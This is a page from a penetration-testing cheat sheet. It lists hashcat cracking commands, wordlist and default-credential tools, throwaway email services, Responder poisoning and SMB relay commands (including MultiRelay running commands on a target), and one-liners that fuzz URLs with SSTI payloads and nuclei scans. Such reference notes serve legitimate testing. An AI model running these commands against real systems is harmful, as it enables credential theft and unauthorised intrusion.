dictionaries - tripmine253/pentest-book GitHub Wiki

Random

# Cyberchef cli alternative
https://github.com/Ciphey/Ciphey

# Default creds (the first two links are credential lists; pydictor, cupp and mentalist generate targeted wordlists from OSINT about a person/org rather than listing defaults):
https://cirt.net/passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
https://github.com/LandGrey/pydictor
https://github.com/Mebus/cupp
https://github.com/sc0tfree/mentalist

# Dedupe wordlists
# https://github.com/nil0x42/duplicut
# Removes duplicate lines from a large wordlist (meant to keep the original line order, unlike sort -u,
# so rule/mask ordering in the list is preserved); -o names the output so the input is left untouched.
./duplicut wordlist.txt -o clean-wordlist.txt

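# Hashcat
# Preview what a rule file does to a wordlist: --stdout cracks nothing, it just prints the
# mangled candidates (useful before committing GPU time to a big rule set).
hashcat --stdout wordlist.txt -r /usr/share/hashcat/rules/best64.rule
# ntlm (-m 1000), brute force (-a 3, default mask when none is given) on device 1 (-d, ids from `hashcat -I`);
# -o writes hash:plaintext pairs, i.e. cleartext passwords - keep that file encrypted and delete it after the job.
hashcat hash_input.txt -m 1000 -a 3 -d 1 -o cracked.txt
# dict attack (-a 0 is the default mode); add -m <hash-type> unless your hashcat release auto-detects it
hashcat hash.txt dict1.txt dict2.txt dict3.txt
# mask attack (-a 3): ?a = any printable ASCII, -i increments the length from 1 up to the full mask.
# The hash file must come before the mask - without it hashcat treats the mask as the hash file.
# 95^7 candidates is only realistic for fast hashes (NTLM, MD5) on a GPU; shorten the mask otherwise.
hashcat -a 3 hash.txt ?a?a?a?a?a?a?a -i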
# Hashcat for noobs
https://github.com/trustedsec/hate_crack

# Good rule file (one large ruleset; pass it to hashcat with -r like best64.rule above)
https://github.com/NotSoSecure/password_cracking_rules/blob/master/OneRuleToRuleThemAll.rule

# Temporary emails (most of these are public, shared inboxes: anyone who guesses or reuses the address can read the mail, and some services log/sell it - never use them for anything tied to a real client, target account or engagement data)
https://www.guerrillamail.com/en/
https://10minutemail.com
https://www.trash-mail.com/inbox/
https://www.mailinator.com
http://www.yopmail.com/en
https://generator.email
https://en.getairmail.com
http://www.throwawaymail.com/en
https://maildrop.cc
https://owlymail.com/en
https://www.moakt.com
https://tempail.com
http://www.yopmail.com
https://temp-mail.org/en
https://www.mohmal.com
http://od.obagg.com 
http://onedrive.readmail.net
http://xkx.me 
https://t.odmail.cn
https://www.emailondeck.com
https://anonbox.net
https://M.kuku.lu
https://www.temp-mails.com/
http://deadfake.com/
https://www.sharklasers.com/
https://mytemp.email/
http://www.mintemail.com/
http://www.eyepaste.com/
mailsucker.net
https://www.emailondeck.com/
https://getnada.com/
http://www.fakeinbox.com/
https://temp-mail.org/
https://www.tempmailaddress.com/
https://tempail.com/
https://tempm.com/
https://mailsac.com/
https://smailpro.com/

# Printer attacks (PRET - Printer Exploitation Toolkit; talks PostScript/PJL/PCL to the device, so test on a lab printer first, it can wipe or brick firmware/settings)
https://github.com/RUB-NDS/PRET

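# Aliases
# Several of these hand real credentials or root-equivalent access to a container or sudo;
# read the comments before pasting them into a shared ~/.bashrc.
alias cat="bat --style=grid"
# Mounting docker.sock gives the container full control of the host's docker daemon (root-equivalent).
alias dockly='docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock lirantal/dockly'
alias sniper='docker run -it xerosecurity/sn1per /bin/bash'
# The curl part sends a request to a third-party service, i.e. it reveals your egress IP to them.
alias myip='ip -br -c a && echo && curl ifconfig.me'
alias lsla='colorls -lA --sd --gs --group-directories-first'
# usage: gitleaks <repo-url>
# The original line had no closing quote, which swallowed every alias after it (bash: unexpected EOF).
# -v --pretty -r are flags of older gitleaks releases; v8+ uses `gitleaks detect` instead.
alias gitleaks='docker run --rm --name=gitleaks zricethezav/gitleaks -v --pretty -r'
# Destructive: discards all local commits and uncommitted changes on the current branch.
alias grp='git reset --hard origin/master && git pull'
alias ccat='pygmentize -O style=monokai -f console256 -g'
alias testssl='~/Escritorio/tools/testssl.sh/testssl.sh'
alias nano='micro'
# ~/.aws is mounted read-only, but the container still sees every profile's access keys; the
# backslash-newlines are inside the single quotes and are re-parsed as continuations on expansion.
alias scoutsuite='cd /home/user/tools/ScoutSuite && docker run --rm -t \
-v ~/.aws:/root/.aws:ro \
-v "$(pwd)/results:/opt/scoutsuite-report" \
scoutsuite:latest \
aws'
alias services_running='systemctl list-units --type=service --state=running'
# ~/PATH is a placeholder, replace it with the tools directory. None of these three scripts
# should need root for normal use - drop the sudo unless one demonstrably fails without it.
alias pwndb='sudo python3 ~/PATH/pwndb/pwndb.py --target'
alias s3scanner='sudo python3 ~/PATH/S3Scanner/s3scanner.py'
alias flumberbuckets='sudo python3 ~/PATH/flumberboozle/flumberbuckets/flumberbuckets.py -p'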

# Responder

# Analyze/Listen mode
# -A only listens and logs LLMNR/NBT-NS/MDNS requests, it does not answer (poison) them:
# run this first to see what a segment is doing before anything active. Replace [Interface] with e.g. eth0.
responder -I [Interface] -A 
# the "or" below is prose, not shell: pick either -i (local IP to use) or -e (external IP to answer with)
responder -I [Interface] -i [IP Address] or -e [External IP] -A
# Normal mode (disable smb and http server in /usr/share/responder/Responder.conf)
# Poisoning answers every failed name lookup on the segment: it is noisy, commonly alerted on, and can
# break name resolution for real users - confirm it is in scope before running. SMB/HTTP are switched
# off in the config so ports 445/80 stay free for the relay tools below. -v verbose; -r also answers
# NetBIOS wredir suffix queries.
responder -I eth0 -rv
# Check targets with smb signing not enabled
# Relay only works against hosts that do not require SMB signing, so enumerate those first.
python RunFinger.py -i 10.0.2.0/24
# MultiRelay with all users for all services
# -u ALL relays every captured account to the target; the captured NTLM material is sensitive loot.
python MultiRelay.py -t 10.0.2.4 -u ALL
# Reverse shell via Multirelay
# -c runs the command on the target in the relayed user's context (typically needs local admin there)
./MultiRelay.py -t <target host> -c <'command to run'> -u <user to target>
# Make changes to config to turn off services:
nano /usr/share/responder/Responder.conf

# Oneliners

# Subdomain scan + alive hosts + web scan
# chaos pulls subdomains from ProjectDiscovery's dataset (needs a Chaos API key in the environment),
# httpx keeps the ones answering HTTP(S), anew dedupes, then every live host is scanned.
# jaeles/nuclei send real attack payloads: only point them at hosts inside the agreed scope.
chaos -d domain.com | httpx -silent | anew | xargs -I@ jaeles scan -u @
chaos -d domain.com | httpx -silent | anew | nuclei -t /nuclei-templates

# Check payload in all param with qsreplace (SSTI example)
# qsreplace puts the payload into every query-string value of every archived URL; ffuf then
# requests each line (FUZZ = the whole URL) and mirrors the traffic into Burp via -replay-proxy.
# waybackurls includes subdomains by default, so prune out-of-scope hosts from fuzz.txt before replaying.
waybackurls http://target.com | qsreplace "ssti{{9*9}}" > fuzz.txt
ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/
# Check in burp for responses with ssti81
# (a template engine that evaluates {{9*9}} echoes "ssti81" back - that string is the signal)


